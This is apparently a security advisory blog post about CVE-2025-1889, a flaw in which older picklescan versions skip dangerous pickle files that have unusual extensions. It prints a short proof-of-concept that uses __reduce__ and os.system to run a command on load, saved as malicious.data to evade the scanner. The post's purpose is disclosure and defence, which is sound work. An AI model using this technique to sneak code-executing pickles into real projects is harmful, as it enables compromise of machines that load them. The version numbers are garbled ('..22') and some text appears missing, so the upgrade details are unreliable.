CVE-2025-1889 - How Picklescan's Old Extension Checks Let Dangerous Pickle Files Slip Through

A recent vulnerability, CVE-2025-1889, has exposed a serious gap in the security of picklescan versions before ..22. If you’re managing Python models, machine learning pipelines, or sharing serialized objects in your team, this affects you. In simple terms: picklescan missed dangerous files just because they had “weird” file extensions.

This post walks you through how this happened, actual exploit details, and why proper file extension checks alone aren’t enough to stay safe.

What Is Picklescan?

picklescan is an open source scanner that reviews Python model files for unsafe pickle usage. Pickle is a Python module that serializes and deserializes Python objects—but pickle can also run arbitrary code, making it a known attack vector if untrusted files are loaded.

picklescan aims to help developers and data scientists by scanning for malicious pickles in their projects.

maybe .pt for PyTorch

But what if someone put a dangerous pickle file in your project with a non-standard extension, like .data or .img?

Attack Scenario

1. Attacker creates a malicious pickle file that would, for example, start a reverse shell or install malware if loaded.

Here’s how an attacker might create a malicious pickle

# evil_pickle.py
import pickle
import os

class Exploit:
    def __reduce__(self):
        # This command runs as soon as this pickle is loaded
        return (os.system, ('echo HACKED > /tmp/pickled',))

evil = Exploit()

with open("malicious.data", "wb") as f:
    pickle.dump(evil, f)

*This creates a file called malicious.data that, when loaded, will write HACKED into /tmp/pickled.*

Now compare what happens with picklescan

picklescan scan ./malicious.data
# Output: No issues detected! (before v..22)

But if you load it in Python

import pickle
pickle.load(open("malicious.data", "rb"))
# HACKED is written to /tmp/pickled!

How To Fix It

Starting with picklescan ..22, the tool scans all files—regardless of extension—for pickle signatures. If you’re still using an older version, update now!

Upgrade using

pip install --upgrade picklescan

Tip: Even with extension checks, always validate and restrict what files are loaded, especially those from public or untrusted sources.

Original References

- Picklescan GitHub Repo
- PyPI Picklescan
- Python pickle security documentation

Update picklescan to >=..22 to make sure hidden malicious pickles can’t sneak by.

- Inspect your workflows for any use of pickle, and consider adopting safer serialization (like JSON) when possible.

CVE-2025-1889 is a good reminder: attackers are clever. Tools need to keep up. So do we!


*Stay safe out there. If you have a custom scan pipeline, make sure it’s not fooled by file extensions—or you might get pickled next time.*

Timeline

Published on: 03/03/2025 19:15:34 UTC
Last modified on: 03/05/2025 20:49:16 UTC